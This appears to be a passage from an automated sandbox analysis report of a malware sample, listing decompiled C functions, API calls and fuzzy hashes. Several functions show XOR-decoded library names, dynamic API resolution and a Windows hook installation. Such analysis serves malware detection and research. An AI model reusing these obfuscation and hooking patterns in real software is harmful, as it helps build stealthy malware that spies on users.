                                                                    0x0041dcbd
                                                                    0x0041dcc2
                                                                    0x0041dcc7
                                                                    0x0041dccb
                                                                    0x0041dcd0
                                                                    0x0041dcd2
                                                                    0x0041dcd2
                                                                    0x0041dcd6
                                                                    0x0041dcd7
                                                                    0x0041dce0
                                                                    0x0041dce8
                                                                    0x0041dce8
                                                                    0x0041dcf2
                                                                    0x0041dcf7

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbyname
                                                                    • String ID: g
                                                                    • API String ID: 930432418-30677878
                                                                    • Opcode ID: 681ba1e63fc9d64e09361fd11fc9229ea0c3001d53b65d207773368dfe6257a1
                                                                    • Instruction ID: 6a6606b875ee5e4dd5b3e8bb9530fcae1f39c61166ddf9f3e084a105846b12ff
                                                                    • Opcode Fuzzy Hash: 681ba1e63fc9d64e09361fd11fc9229ea0c3001d53b65d207773368dfe6257a1
                                                                    • Instruction Fuzzy Hash: 7001C86150D3C0AEE312D77C984479FBED16BA2308F48CC9DE4D887243E2BA8559D767
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E004198D0() {
                                                                    				char _v260;
                                                                    				char _v263;
                                                                    				char _v264;
                                                                    				char _v265;
                                                                    				char _v266;
                                                                    				char _v267;
                                                                    				char _v268;
                                                                    				char _v269;
                                                                    				char _v270;
                                                                    				char _v271;
                                                                    				char _v272;
                                                                    				char _v273;
                                                                    				char _v274;
                                                                    				char _v275;
                                                                    				char _v276;
                                                                    				char _v277;
                                                                    				char _v278;
                                                                    				char _v279;
                                                                    				char _v280;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				signed int _t31;
                                                                    				struct HINSTANCE__* _t36;
                                                                    				_Unknown_base(*)()* _t37;
                                                                    				void* _t41;
                                                                    				void* _t46;
                                                                    				intOrPtr _t53;
                                                                    				signed short _t58;
                                                                    				signed short _t61;
                                                                    				struct HINSTANCE__* _t65;
                                                                    				void* _t68;
                                                                    
                                                                    				_t68 =  &_v280;
                                                                    				_v278 = 0x99;
                                                                    				_v275 = 0x99;
                                                                    				_v280 = 0xf5;
                                                                    				_v273 = 0xf5;
                                                                    				_v265 = 0xbc;
                                                                    				_v264 = 0xbc;
                                                                    				_t31 =  *0x447d40; // 0x0
                                                                    				_v279 = 0x87;
                                                                    				_v277 = 0x9e;
                                                                    				_v276 = 0x94;
                                                                    				_v274 = 0x82;
                                                                    				_v272 = 0x8c;
                                                                    				_v271 = 0xa3;
                                                                    				_v270 = 0xb5;
                                                                    				_v269 = 0xa2;
                                                                    				_v268 = 0xa6;
                                                                    				_v267 = 0xfe;
                                                                    				_v266 = 0xb4;
                                                                    				_v263 = 0xd0;
                                                                    				_t46 = 0;
                                                                    				do {
                                                                    					_t21 = _t31 + 0x6d; // 0x6d
                                                                    					_t31 = _t31 + (_t21 | 0x00000073) * 0x00000065 | 0x00005be7;
                                                                    					 *(_t68 + _t46 + 8) =  *(_t68 + _t46 + 8) ^ 0x000000d0;
                                                                    					_t46 = _t46 + 1;
                                                                    				} while (_t46 < 0x12);
                                                                    				E0041BA80( &_v280,  &_v260, 0x104);
                                                                    				if(E0041B770( &_v272) != 0xffffffff) {
                                                                    					L4:
                                                                    					_t36 = LoadLibraryA( &_v260); // executed
                                                                    					_t65 = _t36;
                                                                    					if(_t65 != 0) {
                                                                    						_t37 = GetProcAddress(_t65, 0x430240);
                                                                    						_t58 =  *0x447d48; // 0x3090
                                                                    						_t61 =  *0x447d44; // 0x0
                                                                    						 *0x447d48 = _t58 + (_t58 ^ 0x0000004f | _t61 + 0x00000065) * 0x70;
                                                                    						return E0041E780(5, _t37, _t65, 0);
                                                                    					}
                                                                    					_t53 =  *0x447d3c; // 0x0
                                                                    					return E004197C0(0x447d40, _t53,  *0x447d44 & 0x0000ffff);
                                                                    				} else {
                                                                    					_push(0x430244);
                                                                    					_push(0x4450c0);
                                                                    					_t41 = E00419810(0x1e00,  &_v260);
                                                                    					if(_t41 == 0) {
                                                                    						return _t41;
                                                                    					} else {
                                                                    						goto L4;
                                                                    					}
                                                                    				}
                                                                    			}


































                                                                    0x004198d0
                                                                    0x004198da
                                                                    0x004198de
                                                                    0x004198e5
                                                                    0x004198e9
                                                                    0x004198ed
                                                                    0x004198f1
                                                                    0x004198f5
                                                                    0x004198fa
                                                                    0x004198ff
                                                                    0x00419904
                                                                    0x00419909
                                                                    0x0041990e
                                                                    0x00419913
                                                                    0x00419918
                                                                    0x0041991d
                                                                    0x00419922
                                                                    0x00419927
                                                                    0x0041992c
                                                                    0x00419931
                                                                    0x00419936
                                                                    0x00419940
                                                                    0x00419944
                                                                    0x00419952
                                                                    0x00419957
                                                                    0x0041995b
                                                                    0x0041995c
                                                                    0x00419970
                                                                    0x00419982
                                                                    0x004199a4
                                                                    0x004199aa
                                                                    0x004199b0
                                                                    0x004199b4
                                                                    0x004199dd
                                                                    0x004199e3
                                                                    0x004199ea
                                                                    0x00419a07
                                                                    0x00000000
                                                                    0x00419a13
                                                                    0x004199bd
                                                                    0x004199d6
                                                                    0x00419984
                                                                    0x00419984
                                                                    0x0041998d
                                                                    0x00419998
                                                                    0x004199a2
                                                                    0x00419a1c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004199a2

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(?,?,00000104,?,?,00000104,00000000), ref: 004199AA
                                                                    • GetProcAddress.KERNEL32(00000000,00430240), ref: 004199DD
                                                                      • Part of subcall function 0041E780: SetWindowsHookExA.USER32(?,?,?,?), ref: 0041E815
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHookLibraryLoadProcWindows
                                                                    • String ID:
                                                                    • API String ID: 2564493370-0
                                                                    • Opcode ID: f4c0eaca3f1d36f1822db83912eddef10c112683c0480ace7c25507cfe721124
                                                                    • Instruction ID: c3e25c6918c220f11438016e708fcb37ef5bbb04fb338ebac01102784be7e557
                                                                    • Opcode Fuzzy Hash: f4c0eaca3f1d36f1822db83912eddef10c112683c0480ace7c25507cfe721124
                                                                    • Instruction Fuzzy Hash: E431F67510C3C19AC325D7389C529DB7B905FE6224F088B6EF4E44B3D2D7288549C3A7
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E0041D440(CHAR* _a4) {
                                                                    				char _v1;
                                                                    				char _v2;
                                                                    				char _v3;
                                                                    				char _v4;
                                                                    				char _v5;
                                                                    				char _v6;
                                                                    				char _v7;
                                                                    				char _v8;
                                                                    				char _v9;
                                                                    				char _v10;
                                                                    				char _v11;
                                                                    				char _v12;
                                                                    				void* _v16;
                                                                    				struct HINSTANCE__* _t22;
                                                                    				intOrPtr _t25;
                                                                    				void* _t29;
                                                                    				intOrPtr _t39;
                                                                    				_Unknown_base(*)()* _t42;
                                                                    				void* _t44;
                                                                    
                                                                    				_t44 =  &_v16;
                                                                    				_t22 =  *0x447f80; // 0x6f450000
                                                                    				if(_t22 != 0) {
                                                                    					L6:
                                                                    					_t42 = GetProcAddress(_t22, _a4);
                                                                    					if(_t42 == 0) {
                                                                    						_t25 =  *0x447d7c; // 0x1
                                                                    						if(_t25 != 0) {
                                                                    							E0041A720(1);
                                                                    						}
                                                                    					}
                                                                    					return _t42;
                                                                    				} else {
                                                                    					_v10 = 0xeb;
                                                                    					_v8 = 0xeb;
                                                                    					_v3 = 0xe9;
                                                                    					_v2 = 0xe9;
                                                                    					_v12 = 0xf2;
                                                                    					_v11 = 0xec;
                                                                    					_v9 = 0xec;
                                                                    					_v7 = 0xe0;
                                                                    					_v6 = 0xf1;
                                                                    					_v5 = 0xab;
                                                                    					_v4 = 0xe1;
                                                                    					_v1 = 0x85;
                                                                    					_t29 = 0;
                                                                    					goto L2;
                                                                    					L2:
                                                                    					 *(_t44 + _t29 + 4) =  *(_t44 + _t29 + 4) ^ 0x00000085;
                                                                    					_t29 = _t29 + 1;
                                                                    					if(_t29 < 0xc) {
                                                                    						goto L2;
                                                                    					} else {
                                                                    						_t22 = LoadLibraryA( &_v12); // executed
                                                                    						 *0x447f80 = _t22;
                                                                    						if(_t22 == 0) {
                                                                    							_t39 =  *0x447d7c; // 0x1
                                                                    							if(_t39 != 0) {
                                                                    								E0041A720(1);
                                                                    								_t22 =  *0x447f80; // 0x6f450000
                                                                    							}
                                                                    						}
                                                                    						goto L6;
                                                                    					}
                                                                    				}
                                                                    			}






















                                                                    0x0041d44c
                                                                    0x0041d45c
                                                                    0x0041d463
                                                                    0x0041d4d8
                                                                    0x0041d4e5
                                                                    0x0041d4e9
                                                                    0x0041d4eb
                                                                    0x0041d4f2
                                                                    0x0041d4f6
                                                                    0x0041d4f6
                                                                    0x0041d4f2
                                                                    0x0041d501
                                                                    0x0041d465
                                                                    0x0041d467
                                                                    0x0041d46b
                                                                    0x0041d473
                                                                    0x0041d477
                                                                    0x0041d47b
                                                                    0x0041d480
                                                                    0x0041d484
                                                                    0x0041d488
                                                                    0x0041d48d
                                                                    0x0041d492
                                                                    0x0041d497
                                                                    0x0041d49c
                                                                    0x0041d4a1
                                                                    0x0041d4a1
                                                                    0x0041d4a3
                                                                    0x0041d4a3
                                                                    0x0041d4a8
                                                                    0x0041d4ac
                                                                    0x00000000
                                                                    0x0041d4ae
                                                                    0x0041d4b3
                                                                    0x0041d4bb
                                                                    0x0041d4c0
                                                                    0x0041d4c2
                                                                    0x0041d4ca
                                                                    0x0041d4ce
                                                                    0x0041d4d3
                                                                    0x0041d4d3
                                                                    0x0041d4ca
                                                                    0x00000000
                                                                    0x0041d4c0
                                                                    0x0041d4ac

                                                                    APIs
                                                                    • LoadLibraryA.KERNELBASE(00000085), ref: 0041D4B3
                                                                    • GetProcAddress.KERNEL32(6F450000,?), ref: 0041D4DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID:
                                                                    • API String ID: 2574300362-0
                                                                    • Opcode ID: 994bc158c80e7a3607f5bd9d8498da847700f2360146d92434e0b1528c90a81d
                                                                    • Instruction ID: 96f8d988506d0574db856a51e747887c3dcd5f8fd35c28b2b85a8ce5e6e5b589
                                                                    • Opcode Fuzzy Hash: 994bc158c80e7a3607f5bd9d8498da847700f2360146d92434e0b1528c90a81d
                                                                    • Instruction Fuzzy Hash: 9521F23160C7819AC315DB7C98545AF7FE01EA2220F08CA6DF4E98B392D234D805C32B
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 76%
                                                                    			E00427472(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t17;
                                                                    				long _t23;
                                                                    				long _t31;
                                                                    				void* _t33;
                                                                    				void* _t34;
                                                                    
                                                                    				_push(0x10);
                                                                    				_push(0x430b60);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t31 =  *(_t33 + 8) *  *(_t33 + 0xc);
                                                                    				 *(_t33 - 0x20) = _t31;
                                                                    				if(_t31 == 0) {
                                                                    					_t31 = _t31 + 1;
                                                                    				}
                                                                    				do {
                                                                    					_t28 = 0;
                                                                    					 *(_t33 - 0x1c) = 0;
                                                                    					if(_t31 > 0xffffffe0) {
                                                                    						L9:
                                                                    						if(_t28 != 0 ||  *0x4483cc == _t28) {
                                                                    							L13:
                                                                    							_t15 = _t28;
                                                                    							L14:
                                                                    							return E00424267(_t15);
                                                                    						} else {
                                                                    							goto L11;
                                                                    						}
                                                                    					}
                                                                    					if( *0x44c298 != 3) {
                                                                    						L7:
                                                                    						if(_t28 != 0) {
                                                                    							goto L13;
                                                                    						}
                                                                    						L8:
                                                                    						_t17 = RtlAllocateHeap( *0x44c294, 8, _t31); // executed
                                                                    						_t28 = _t17;
                                                                    						goto L9;
                                                                    					}
                                                                    					_t31 = _t31 + 0x0000000f & 0xfffffff0;
                                                                    					 *(_t33 + 0xc) = _t31;
                                                                    					_t23 =  *(_t33 - 0x20);
                                                                    					if(_t23 >  *0x44c284) {
                                                                    						goto L7;
                                                                    					}
                                                                    					E004241FB(_t23, 0, 4);
                                                                    					 *(_t33 - 4) =  *(_t33 - 4) & 0;
                                                                    					_push(_t23);
                                                                    					 *(_t33 - 0x1c) = E00424EED();
                                                                    					 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
                                                                    					E0042751C();
                                                                    					_t28 =  *(_t33 - 0x1c);
                                                                    					if(_t28 == 0) {
                                                                    						goto L8;
                                                                    					}
                                                                    					E004282F0(_t28, 0,  *(_t33 - 0x20));
                                                                    					_t34 = _t34 + 0xc;
                                                                    					goto L7;
                                                                    					L11:
                                                                    				} while (E00422EFD(_t31) != 0);
                                                                    				goto L14;
                                                                    			}








                                                                    0x00427472
                                                                    0x00427474
                                                                    0x00427479
                                                                    0x00427481
                                                                    0x00427485
                                                                    0x0042748a
                                                                    0x0042748c
                                                                    0x0042748c
                                                                    0x0042748d
                                                                    0x0042748d
                                                                    0x0042748f
                                                                    0x00427495
                                                                    0x004274fc
                                                                    0x004274fe
                                                                    0x00427525
                                                                    0x00427525
                                                                    0x00427527
                                                                    0x0042752c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274fe
                                                                    0x0042749e
                                                                    0x004274e7
                                                                    0x004274e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274eb
                                                                    0x004274f4
                                                                    0x004274fa
                                                                    0x00000000
                                                                    0x004274fa
                                                                    0x004274a3
                                                                    0x004274a6
                                                                    0x004274a9
                                                                    0x004274b2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274b6
                                                                    0x004274bc
                                                                    0x004274bf
                                                                    0x004274c6
                                                                    0x004274c9
                                                                    0x004274cd
                                                                    0x004274d2
                                                                    0x004274d7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004274df
                                                                    0x004274e4
                                                                    0x00000000
                                                                    0x00427508
                                                                    0x0042750f
                                                                    0x00000000

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 004274B6
                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00430B60), ref: 004274F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateHeap__lock
                                                                    • String ID:
                                                                    • API String ID: 4078605025-0
                                                                    • Opcode ID: e81c8c7896e6757c30454934b7f8cd92f395e6b4550398b2e8a0c01c2fe6baa4
                                                                    • Instruction ID: bfae256081f821e7f8ac716b83104b51698f36759015f55dcba3785e7d1a2aa1
                                                                    • Opcode Fuzzy Hash: e81c8c7896e6757c30454934b7f8cd92f395e6b4550398b2e8a0c01c2fe6baa4
                                                                    • Instruction Fuzzy Hash: 33112632E01635A7CB21ABA2BC01A6FBB30FB94734F55021BFD2027290CB7C49418E5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E004284D0(void* __eflags, signed int _a4, long _a8, long _a12) {
                                                                    				void* _t11;
                                                                    				signed int _t12;
                                                                    				long _t13;
                                                                    				signed int _t17;
                                                                    				signed int _t19;
                                                                    				signed int _t27;
                                                                    				signed int _t29;
                                                                    
                                                                    				_t29 = _a4;
                                                                    				_t11 = E00428AF0(_t29);
                                                                    				if(_t11 != 0xffffffff) {
                                                                    					_t12 = SetFilePointer(_t11, _a8, 0, _a12); // executed
                                                                    					_t27 = _t12;
                                                                    					if(_t27 != 0xffffffff) {
                                                                    						_t13 = 0;
                                                                    					} else {
                                                                    						_t13 = GetLastError();
                                                                    					}
                                                                    					if(_t13 == 0) {
                                                                    						 *( *((intOrPtr*)(0x44b140 + (_t29 >> 5) * 4)) + 4 + ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4) =  *( *((intOrPtr*)(0x44b140 + (_t29 >> 5) * 4)) + 4 + ((_t29 & 0x0000001f) + (_t29 & 0x0000001f) * 8) * 4) & 0x000000fd;
                                                                    						_t17 = _t27;
                                                                    					} else {
                                                                    						_t17 = E00426868(_t13) | 0xffffffff;
                                                                    					}
                                                                    					return _t17;
                                                                    				} else {
                                                                    					_t19 = E00426856();
                                                                    					 *_t19 = 9;
                                                                    					return _t19 | 0xffffffff;
                                                                    				}
                                                                    			}










                                                                    0x004284d1
                                                                    0x004284d6
                                                                    0x004284df
                                                                    0x004284fd
                                                                    0x00428503
                                                                    0x00428508
                                                                    0x00428512
                                                                    0x0042850a
                                                                    0x0042850a
                                                                    0x0042850a
                                                                    0x00428516
                                                                    0x0042853c
                                                                    0x0042853f
                                                                    0x00428518
                                                                    0x0042851f
                                                                    0x0042851f
                                                                    0x00428543
                                                                    0x004284e1
                                                                    0x004284e1
                                                                    0x004284e6
                                                                    0x004284f0
                                                                    0x004284f0

                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?,?,0042859B,?,00000000,004259D3,00431208,0000000C,004256A8,?,00000000,00000002), ref: 004284FD
                                                                    • GetLastError.KERNEL32 ref: 0042850A
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastPointer
                                                                    • String ID:
                                                                    • API String ID: 2976181284-0
                                                                    • Opcode ID: 9d190bc6e34d8550181400497a14818f8a133a0c386203cef0282ceb97a38b38
                                                                    • Instruction ID: dd7b84ae24795ce0e2b10bafc60694b1088d464c9d0fc203117d3f49822eefd9
                                                                    • Opcode Fuzzy Hash: 9d190bc6e34d8550181400497a14818f8a133a0c386203cef0282ceb97a38b38
                                                                    • Instruction Fuzzy Hash: FF01F4323061315ACA146B7DBC0565E37599B82334B62075FF531CB2E2DF34C8818669
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 18%
                                                                    			E0042275E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				char _t9;
                                                                    				intOrPtr _t12;
                                                                    				intOrPtr _t21;
                                                                    				void* _t22;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x430358);
                                                                    				_t9 = E0042422C(__ebx, __edi, __esi);
                                                                    				_t21 =  *((intOrPtr*)(_t22 + 8));
                                                                    				if(_t21 != 0) {
                                                                    					if( *0x44c298 != 3) {
                                                                    						_push(_t21);
                                                                    						goto L7;
                                                                    					} else {
                                                                    						E004241FB(__ebx, __edi, 4);
                                                                    						 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
                                                                    						_t12 = E0042470E(_t21);
                                                                    						 *((intOrPtr*)(_t22 - 0x1c)) = _t12;
                                                                    						if(_t12 != 0) {
                                                                    							_push(_t21);
                                                                    							_push(_t12);
                                                                    							E00424739();
                                                                    						}
                                                                    						 *(_t22 - 4) =  *(_t22 - 4) | 0xffffffff;
                                                                    						_t9 = E004227B1();
                                                                    						if( *((intOrPtr*)(_t22 - 0x1c)) == 0) {
                                                                    							_push( *((intOrPtr*)(_t22 + 8)));
                                                                    							L7:
                                                                    							_push(0);
                                                                    							_t9 = RtlFreeHeap( *0x44c294); // executed
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E00424267(_t9);
                                                                    			}







                                                                    0x0042275e
                                                                    0x00422760
                                                                    0x00422765
                                                                    0x0042276a
                                                                    0x0042276f
                                                                    0x00422778
                                                                    0x004227ba
                                                                    0x00000000
                                                                    0x0042277a
                                                                    0x0042277c
                                                                    0x00422782
                                                                    0x00422787
                                                                    0x0042278d
                                                                    0x00422792
                                                                    0x00422794
                                                                    0x00422795
                                                                    0x00422796
                                                                    0x0042279c
                                                                    0x0042279d
                                                                    0x004227a1
                                                                    0x004227aa
                                                                    0x004227ac
                                                                    0x004227bb
                                                                    0x004227bb
                                                                    0x004227c3
                                                                    0x004227c3
                                                                    0x004227aa
                                                                    0x00422778
                                                                    0x004227ce

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 0042277C
                                                                      • Part of subcall function 004241FB: RtlEnterCriticalSection.NTDLL(?), ref: 00424223
                                                                    • RtlFreeHeap.NTDLL(00000000,?,00430358,0000000C,00424114,00000000,?,00423E81,?,004303A8,00000060), ref: 004227C3
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614175306.0000000000454000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_serv.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterFreeHeapSection__lock
                                                                    • String ID:
                                                                    • API String ID: 3012239193-0
                                                                    • Opcode ID: 500748c703418b79234f21d4c180be21aee65210f67ae0e47c02a248357e7d5d
                                                                    • Instruction ID: cee6fc367ec25093234ebcaeb7b2bae8dc6007038bfe58ee458f5e7544efea2a
                                                                    • Opcode Fuzzy Hash: 500748c703418b79234f21d4c180be21aee65210f67ae0e47c02a248357e7d5d
                                                                    • Instruction Fuzzy Hash: B0F09631B05335FADB606BB2BD46B5F7B20EF81764FA4115BF814650D0CBBC4540896C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    			E00422E44(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				long _t19;
                                                                    				void* _t21;
                                                                    
                                                                    				_push(0xc);
                                                                    				_push(0x4303b8);
                                                                    				E0042422C(__ebx, __edi, __esi);
                                                                    				_t19 =  *(_t21 + 8);
                                                                    				if( *0x44c298 != 3 || _t19 >  *0x44c284) {
                                                                    					L3:
                                                                    					if(_t19 == 0) {
                                                                    						_t19 = _t19 + 1;
                                                                    					}
                                                                    					if( *0x44c298 != 1) {
                                                                    						_t19 = _t19 + 0x0000000f & 0xfffffff0;
                                                                    					}
                                                                    					_t9 = RtlAllocateHeap( *0x44c294, 0, _t19); // executed
                                                                    				} else {
                                                                    					E004241FB(__ebx, __edi, 4);
                                                                    					 *(_t21 - 4) =  *(_t21 - 4) & 0x00000000;
                                                                    					_push(_t19);
                                                                    					 *(_t21 - 0x1c) = E00424EED();
                                                                    					 *(_t21 - 4) =  *(_t21 - 4) | 0xffffffff;
                                                                    					E00422EB6();
                                                                    					_t9 =  *(_t21 - 0x1c);
                                                                    					if( *(_t21 - 0x1c) == 0) {
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				return E00424267(_t9);
                                                                    			}





                                                                    0x00422e44
                                                                    0x00422e46
                                                                    0x00422e4b
                                                                    0x00422e50
                                                                    0x00422e5a
                                                                    0x00422e8a
                                                                    0x00422e8c
                                                                    0x00422e8e
                                                                    0x00422e8e
                                                                    0x00422e96
                                                                    0x00422e9b
                                                                    0x00422e9b
                                                                    0x00422ea7
                                                                    0x00422e64
                                                                    0x00422e66
                                                                    0x00422e6c
                                                                    0x00422e70
                                                                    0x00422e77
                                                                    0x00422e7a
                                                                    0x00422e7e
                                                                    0x00422e83
                                                                    0x00422e88
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00422e88
                                                                    0x00422eb2

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00422E66
                                                                      • Part of subcall function 004241FB: RtlEnterCriticalSection.NTDLL(?), ref: 00424223
                                                                    • RtlAllocateHeap.NTDLL(00000000,?,004303B8), ref: 00422EA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.614064819.0000000000401000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.614054945.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614107224.0000000000430000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000431000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614121957.0000000000434000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614152577.0000000000446000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000002.00000002.614166848.0000000000453000.00000080.00000001.01000000.00000006.sdmpDownload File
